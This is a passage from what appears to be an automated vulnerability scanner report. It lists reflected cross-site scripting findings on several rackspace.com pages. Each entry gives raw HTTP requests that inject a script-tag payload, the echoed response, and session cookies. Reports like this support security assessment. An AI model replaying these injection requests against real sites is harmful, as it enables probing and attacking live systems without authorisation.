GET /information/legal/sharepointappterms.php?dec61"><script>alert(1)</script>f5b590d92a6=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... rack_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/legal/sharepointappterms.php?dec61"><script>alert(1)</script>f5b590d92a6=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a425300ec182657b7e0','custclient','width=500,height=320');return fal ...[SNIP]...
4.152. http://www.rackspace.com/information/links.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /information/links.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aaa2e"><script>alert(1)</script>5a35fbc33f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /information/links.php?aaa2e"><script>alert(1)</script>5a35fbc33f8=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... rap" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/links.php?aaa2e"><script>alert(1)</script>5a35fbc33f8=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a423706ce3acae18c89','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.153. http://www.rackspace.com/information/mediacenter/links.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /information/mediacenter/links.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fa63"><script>alert(1)</script>bc94c2bf2c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /information/mediacenter/links.php?8fa63"><script>alert(1)</script>bc94c2bf2c6=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... rap" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/links.php?8fa63"><script>alert(1)</script>bc94c2bf2c6=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a4242353bda923acdd2','custclient','width=500,height=320');return fal ...[SNIP]...
4.154. http://www.rackspace.com/information/newsroom/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /information/newsroom/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77ccd"><script>alert(1)</script>b2db4d002c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 77ccd\"><script>alert(1)</script>b2db4d002c9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /information/newsroom/?77ccd"><script>alert(1)</script>b2db4d002c9=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d1e1"><script>alert(1)</script>a6ab46874fc was submitted in the REST URL parameter 3. This input was echoed as 8d1e1\"><script>alert(1)</script>a6ab46874fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /information/newsroom/index.php8d1e1"><script>alert(1)</script>a6ab46874fc HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/newsroom/index.php8d1e1\"><script>alert(1)</script>a6ab46874fc&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42a8503e776f91e0e5','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.156. http://www.rackspace.com/managed_hosting/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /managed_hosting/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c09e"><script>alert(1)</script>0eff7bb63a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/?1c09e"><script>alert(1)</script>0eff7bb63a7=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... ite-wrap" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/managed_hosting/?1c09e"><script>alert(1)</script>0eff7bb63a7=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a42a9db35b45dd84769','custclient','width=500,height=320');return fal ...[SNIP]...
4.157. http://www.rackspace.com/managed_hosting/configurations.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /managed_hosting/configurations.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a388"><script>alert(1)</script>269221c25b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/configurations.php?4a388"><script>alert(1)</script>269221c25b=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... ick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/managed_hosting/configurations.php?4a388"><script>alert(1)</script>269221c25b=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42a8503e776f91e0e5','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.158. http://www.rackspace.com/managed_hosting/dedicated_servers.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /managed_hosting/dedicated_servers.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52935"><script>alert(1)</script>6e41b61991 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/dedicated_servers.php?52935"><script>alert(1)</script>6e41b61991=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... ="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/managed_hosting/dedicated_servers.php?52935"><script>alert(1)</script>6e41b61991=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42a8503e776f91e0e5','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.159. http://www.rackspace.com/managed_hosting/ecommerce/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /managed_hosting/ecommerce/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f37f9"><script>alert(1)</script>699687afa84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/ecommerce/index.php?f37f9"><script>alert(1)</script>699687afa84=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... ck="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/managed_hosting/ecommerce/index.php?f37f9"><script>alert(1)</script>699687afa84=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a4242353bda923acdd2','custclient','width=500,height=320');return fal ...[SNIP]...
4.160. http://www.rackspace.com/managed_hosting/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /managed_hosting/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c4f8"><script>alert(1)</script>3846902dc87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/index.php?5c4f8"><script>alert(1)</script>3846902dc87=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
4.161. http://www.rackspace.com/managed_hosting/managed_colocation/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /managed_hosting/managed_colocation/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d220"><script>alert(1)</script>98f69d8e3cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/managed_colocation/index.php?2d220"><script>alert(1)</script>98f69d8e3cf=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... _chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/managed_hosting/managed_colocation/index.php?2d220"><script>alert(1)</script>98f69d8e3cf=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a42a9db35b45dd84769','custclient','width=500,height=320');return fal ...[SNIP]...
4.162. http://www.rackspace.com/managed_hosting/private_cloud/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /managed_hosting/private_cloud/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7dbf"><script>alert(1)</script>cc934d41c56 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
